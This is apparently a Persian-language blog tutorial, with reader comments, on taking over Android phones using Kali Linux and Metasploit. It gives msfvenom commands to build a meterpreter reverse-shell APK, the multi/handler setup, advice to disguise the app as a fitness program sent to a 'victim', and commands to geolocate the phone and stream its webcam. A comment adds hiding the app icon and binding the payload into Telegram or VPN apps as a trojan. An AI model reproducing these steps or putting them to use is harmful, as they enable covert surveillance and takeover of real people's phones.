سلام
دوستان تو ایـــن پست در مورد نفوذ به سیستم عامل ویندوز نکته ای رو اموزش دادم
این مطلب در ادامه همون و با استفاده از ابزارهای کالی لینوکس پلفرم محبوب هکرها میخام نحوه نفوذ به گوشی اندرویدی رو اموزش بدوم
هدف ارتقا دانش امنیت در فضای سایبری هست هر چند این نوع اموزشها صرف اموزش پایه هست و پارامترهای زیادی با موضوع اصلی فاصله هست
پس ازمطالعه این اموزش میتونید تست نفوذ رو انجام بدید سیستم من کالی لینوکس رو ماشین مجازی نصب شده ولی اصولش اینه لایو(live) باشه یعنی کالی بعنوان سیستم اصلی نصب بشه عمده ترین تفاوت در تنظیمات شبکه و سرعت انجام کار هست
من فرض میکنم شما آموزشهای لینوکس کالی را برای مبتدیان خواندید. در لینوکس کالی، ابزار شناخته شده به عنوان Metasploit وجود دارد
Metasploit چارچوبی است که در اون هر نوع ابزار تست موجود است. شما می توانید هر چیزی مانند کامپیوتر، سرور، -، و غیره هک کنید. اگر شما مبتدی باشید، آموزش Metasploit رو میتونید در گوگل جستجو کنید در سایتهای داخلی هم توضیح زیاده
بصورت خلاصه متاسپلویت چارچوبی برای تست نفوذ هست
من مراحلی که در انجام تست نفوذ انجام دادم رو بصورت مرحله به مرحله اسکرین شات تهیه کردم بصورت ترتیبی با توضیح میزارم
خب وقتی وارد محیط کالی شدید ترمینال لینوکس رو باز کنید
در ترمینال برای گرفتن ای پی این درستور رو وارد کنید
ifconfig
دستور msfvenom توضیح کوچیک
Msfvenom یک نمونه خط فرمان از Metasploit است که برای تولید و خروجی انواع مختلف کد های پوسته موجود در Metasploit استفاده می شود
خب ابتدا ای پی لینوکس رو با دستور بالا میگیریم
سپس در قدم اول یه فایل apk برای نصب در سیستم قربانی تهیه میکنیم فقط با یک خط
msfvenom -p android/meterpreter/reverse_tcp LPORT=192.168.199.137 LPORT=4444 -R> anyname.apk
خب پس از نوشتن دستور بالا با زدن اینتر یه فایل اندرویدی با نام دلخواه در پوشه home ایجاد میشه میتونید میسر هم بهش بدید اما اینجا وارد جزیییات نمیشیم
فایل ایجاد شده رو به یه هاستی اپلود کنید و یا به نحوی از طریق تلگرام و یا واتس اپ به گوشی خودتون بفرستید
در حین نصب مانند شکل زیر
دسترسی های زیادی میگیره تقریبا همه دسترسی ها رو میگیره و در حین نصب اگه اندروید بالای 4 باشه اخطار ویروس میده --خب یه توضیح
توی سی شارپ وقتی یه کی لاگر مینویسم خیلی شده در لحظه اجرا همون بیت دفندر ویندوز بهش گیر داده و پاکش کرده اما اگه کد نویس کدنویس باشه میتونه کاری کنه انتی ویروس اصلا بهش گیر نده--
خب اینم همینطوره میتونید با اضافه کردن پارامترهای ساخت برنامه اندرویدی از این کار جلوگیری کنید این بحث گسترده است--
توضیح مختصر
در payload من reverse_tcp دارم چون تمام قوانین فایروال را حذف می کند و فایر وال رو دور میزنه بهمون خاطر انتی ویروس بهش گیر میده
LHOST: آدرس IP لوکال شماست اطمینان حاصل کنید که هدف تلفن همراه شما از همان شبکه استفاده می کند. بعدا، به شما خواهم گفت که چگونه گوشی های اندرویدی که خارج از شبکه شما هستند را هک کنید.
LPORT: برای انتخاب شماره پورت من 4444 را انتخاب کرده ام زیرا رایگان است. شما می توانید هر کسی را انتخاب کنید، اما در مورد خاص، من شما را توصیه انتخاب 443. این شماره پورت برای https است
خب دوبره برمیگیردیم به صفحه کنسول یا ترمینال لینوکس
در محیط ترمینال این دستور رو میزنید
شروع اکسپولیت
use exploit/multi/handler
set payload android/meterpreter/reverse_tcpتنظیم ای پی و پورت همه کدها رو یکجا بعدا نشون میدم
set LHOST 192.168.199.137
set LPORT 4444
run
الان سیستم در حالت اماده باش قرار داره تا با باز شدن برنامه به گوشی متصل بشه
این تصویر کل عملیات هست
میتونید در قالب یه برنامه بدنسازی یا هر اسمی به قربانی بفرستید
الان قربای با باز کردن برنامه عین دستورات زیر در کنسول یا همون ترمینال درج میشه و دسترسی به گوشی ازاد میشه
چند دستور ساده
wlan_geolocate
مکانیابی گوشی قربانی
webcam_stream
یه مرورگر باز میکنه و دوربین رو هم روشن میکنه
T.me/rpdwolf
سلام.پورت های سه رقمی دقیق روی serveo جواب نمیدن.بهتره ۴ رقمی باشه.و مشکل دوم serveo با اینترنت دیتا هستش.بهتره مودم باشه تا روی started گیر نکنه.امیدوارم باعث تخریب زندگی کسی نشیم...
دوست گرامی بله منظورت توی لینوکس اگه بعد از نصب و اجرای برنامه توی گوشی طرف بنویسید hide_app_icon بنویسید برنامه مخفی میشه.
و به نظر من بهتره از دستور زیر جهت Embed یا همون بایند کردن و یا همون ادغام کردن با برنامه دیگه استفاده کنید.
Msfvenom -x /root/Desktop/orginalappname.apk -p android/meterpreter/reverse_tcp lport=? lhost=? -o /root/Deaktop/newpayload.apk
البته این روی لینوکسه.روی ترموکس باید ادرستون رو به /sdcard/downloads تغییر بدید.با این میتونید روی تلگرام یا ف.تر شک.ن یا حتی زاپیا سوارش کنید و مثل تروا بشه بدید طرف نصب کنه.دگ نیاز به مخفی کردنم نیست.و اگه روی تلگرام سوارش کنید،میتونید از صفحه تلگرام حتی اسکرین شات بگیرید..موفق باشید @rpdwolf